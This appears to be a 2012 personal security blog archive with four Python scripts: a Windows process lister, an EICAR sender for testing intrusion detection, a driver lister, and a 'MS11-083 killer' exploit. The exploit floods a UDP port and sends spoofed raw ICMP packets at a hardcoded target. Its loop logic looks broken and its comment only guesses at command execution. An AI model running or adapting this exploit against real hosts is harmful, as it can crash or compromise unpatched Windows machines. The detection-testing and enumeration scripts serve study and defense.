______ Y ______
My own personal time capsule.
Tag Archives: windows
PID Enumeration on Windows with pure python ctypes
Posted by on January 27, 2012
Following code will enumerate process ID’s on the current system by calling EnumProcesses from psapi on Windows. Should for for majority of windows distributions that have psapi.dll in %systemroot%.
from ctypes import *
psapi = windll.psapi
print "[+] PID dumper by Y"
print "[+] contact : If you know me then give me a shout"
def getListOfProcesses():
max_array = c_ulong * 4096 # define long array to capture all the processes
pProcessIds = max_array() # array to store the list of processes
pBytesReturned = c_ulong() # the number of bytes returned in the array
#EnumProcess
psapi.EnumProcesses(byref(pProcessIds),
sizeof(pProcessIds),
byref(pBytesReturned))
# get the number of returned processes
nReturned = pBytesReturned.value/sizeof(c_ulong())
pidProcessArray = [i for i in pProcessIds][:nReturned]
for processes in pidProcessArray:
print "[+] Running Process PID %d" % processes
getListOfProcesses()
IDS/IPS Testing with EICAR
Posted by on January 26, 2012
Following script will attempt to submit common malware string EICAR on multiple ports for IDS/IPS system to alert on in. It can be used to test how well does IDS pick up various malware that can be seen on the wire.
# IMPORTS
import socket
import httplib,urllib
import ftplib
import telnetlib
# the eicar string to test with
EICAR = "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
############# CONFIGURATION #############
IP = "127.0.0.1"
############# END OF CONF #############
def info():
print "[+] Multi-Protocol EICAR tester by Y"
print "[+] contact : If you know me then give me a shout"
print "[+] Supports - HTTP, FTP, TELNET, SSL , TCP , UDP , DNS"
print "[+] NOTE: Set NC listener on specific ports between the hosts and DIS and watch IDS alerting on protocols"
print "[+] Following ports are used: 21(TCP),23(TCP),25(TCP),100(UDP),80(TCP),22(TCP),443(TCP),53(UDP)"
def sendHTTP(data,target,port):
try:
print "[+] Sending HTTP request"
conn = httplib.HTTPConnection(target,port)
try:
print "\t HEAD"
conn.request("HEAD",EICAR)
except:
pass
try:
print "\t GET"
conn.request("GET",EICAR)
except:
pass
try:
print "\t POST"
params = urllib.urlencode({'eicar': EICAR})
headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
conn.request("POST", "", params, headers)
except:
pass
try:
print "\t PUT"
conn.request("PUT",EICAR)
except:
pass
try:
print "\t DELETE"
conn.request("DELETE",EICAR)
except:
pass
except Exception,e:
print "[-] Unable to send HTTP data due to : ",e
pass
def sendFTP(data,target,port):
try:
print "[+] Sending FTP request"
ftp = ftplib.FTP()
ftp.connect(target, port)
ftp.putline(data) # send single EICAR request
ftp.close()
except Exception,e:
print "[-] Unable to send FTP data due to : ",e
pass
def sendTelnet(data,target,port):
try:
print "[+] Sending TELNET request"
tn = telnetlib.Telnet(target,port)
tn.write(EICAR)
tn.close()
except Exception,e:
print "[-] Unable to send TELNET data due to : ",e
pass
def sendSMTP(data,target,port):
try:
print "[+] Sending SMTP request"
tn = telnetlib.Telnet(target,port)
tn.write("HELO localhost")
tn.write("MAIL FROM: root@localhost")
tn.write("RCPT TO: root@localhost")
tn.write("DATA \n")
tn.write(EICAR)
tn.write("\n\t\n\t")
tn.write("QUIT")
tn.close()
except Exception,e:
print "[-] Unable to send SMTP data due to : ",e
pass
def sendSSH(data,targer,port):
pass
def sendSSL(data,target,port):
try:
print "[+] Sending HTTP request"
conn = httplib.HTTPSConnection(target,port)
try:
print "\t HEAD"
conn.request("HEAD",EICAR)
except:
pass
try:
print "\t GET"
conn.request("GET",EICAR)
except:
pass
try:
print "\t POST"
params = urllib.urlencode({'eicar': EICAR})
headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
conn.request("POST", "", params, headers)
except:
pass
try:
print "\t PUT"
conn.request("PUT",EICAR)
except:
pass
try:
print "\t DELETE"
conn.request("DELETE",EICAR)
except:
pass
except Exception,e:
print "[-] Unable to send HTTP data due to : ",e
pass
def sendICMP(data,target):
pass
def sendRCP(data,target,port):
pass
def sendTCP(data,target,port):
try:
print "[+] Sending TCP data "
socket.setdefaulttimeout(4)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, int(port)))
s.send(data)
s.close()
except Exception,e:
print "[-] Unable to send TCP data due to : ",e
pass
def sendUDP(data,target,port):
try:
print "[+] Sending UDP data "
sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
sock.sendto( data, (target, port))
except Exception,e:
print "[-] Unable to send UDP data due to : ",e
pass
def sendNETBIOS(data,target,port):
pass
def sendDNS(data,target,port):
try:
print "[+] Sending DNS request "
sendUDP(data, target, port) # dirty trick
except Exception,e:
print "[-] Unable to send DNS data due to : ",e
pass
def end():
print "Done, now review IDS logs for each protocol"
def start_test():
info()
sendFTP(EICAR, IP, 21)
sendTelnet(EICAR, IP, 23)
sendSMTP(EICAR, IP, 25)
sendUDP(EICAR,IP, 100)
sendHTTP(EICAR, IP, 80)
sendTCP(EICAR, IP, 22)
sendSSL(EICAR, IP, 443)
sendDNS(EICAR,IP,53)
#TODO:
#Protocol play ( these are HPING2 wrappers )
#sendICMP(EICAR,'192.168.2.79')
#sendRCP(EICAR, '192.168.2.79', 445)
#sendNETBIOS(EICAR, '192.168.2.79', 139)
#sendSSH(EICAR, '192.168.2.79', 22)
sendDNS(EICAR,IP,53)
end()
# start_test the test
start_test()
MS11-083 killer
Posted by on January 26, 2012
Following code will attempt to exploit the MS11-083 by sending specially crafted packets to closed UDP port ( read more here).
import socket
import threading
try:
from dpkt.ip import IP
from dpkt.icmp import ICMP
except:
print "install dpkt if you want this program to run!"
print "[+] MS11-083 killer by Y"
print "[+] contact : If you know me then give me a shout"
############ EDIT THIS #################
UDP_IP="192.168.93.15"
UDP_PORT=839
MESSAGE="\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00"
ThreadCount = 32
########################################
print " [+]UDP target IP:", UDP_IP
print " [+]UDP target port:", UDP_PORT
print " [+]UDP payload lenght:", len(MESSAGE)
def customPing(UDP_IP,repeat):
# craft custom ping
dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)
icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))
ip.data = icmp
ip.len += len(ip.data)
print "[+] Building socket for final ping"
s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
s.connect((UDP_IP, 1))
# sending packet
print "[+] Sending final ping ( debug trap ) "
for x in range(10):
s.send(str(ip))
try:
print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.setblocking(0) # set non-blocking mode
class ThreadClass(threading.Thread):
def run(self):
c = 0
while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter
s.sendto( MESSAGE, (UDP_IP,UDP_PORT ))
# trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?)
print "[+] Triggering actual attack "
customPing(UDP_IP,20)
for i in range(ThreadCount):
t = ThreadClass()
t.start()
print "[+] Thread ",i," is starting and its name is : " , t.getName()
except Exception,e:
print " [-] Exception occured, reason : " , e
Note that this code is only for the educational purposes and I do not take the responsibility for any missuses.
Dumping Drivers on Windows
Posted by on January 16, 2012
Ever wonder how to list all the drivers on your windows machine ? Here is a quick answer coded in Python that hopefully can help some people.
from ctypes import *
#Windows modules loader
kernel32 = windll.kernel32
psapi = windll.psapi
class drivers():
def getAllDeviceDrivers(self):
lpcbNeeded = c_ulong(0)
empty_init_array = c_ulong * 1024
lpImageBase = empty_init_array()
drivername_size = c_long()
drivername_size.value = 48
if psapi.EnumDeviceDrivers(byref(lpImageBase),sizeof(c_void_p)*1024,byref(lpcbNeeded)):
no_drivers = int(lpcbNeeded.value / sizeof(c_void_p))
print "[*] EnumDeviceDrivers: %d modules detected" % no_drivers
print "\t[+] Dumping all device drivers"
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, drivername_size.value)
driverpath = c_char_p("\x00"*drivername_size.value)
psapi.GetDeviceDriverFileNameA(baseaddy,driverpath,drivername_size.value)
# if we have drivers with addresses allocated within 0x80000000 and 0xFFFFFFFF they loaded directly kernel
if baseaddy > 2147483648 and baseaddy < 4294967295:
print "\t\t [-] Kernel Driver",drivername.value.lower(),"is located on 0x%08x load path is %s" % (baseaddy,driverpath.value.lower())
else:
# user level drivers are within 0x00000000 and 0x7FFFFFFF
print "\t\t [-] User Driver",drivername.value.lower(),"is located on 0x%08x load path is %s" % (baseaddy,driverpath.value.lower())
drivers = drivers()
drivers.getAllDeviceDrivers()
______ Y ______ 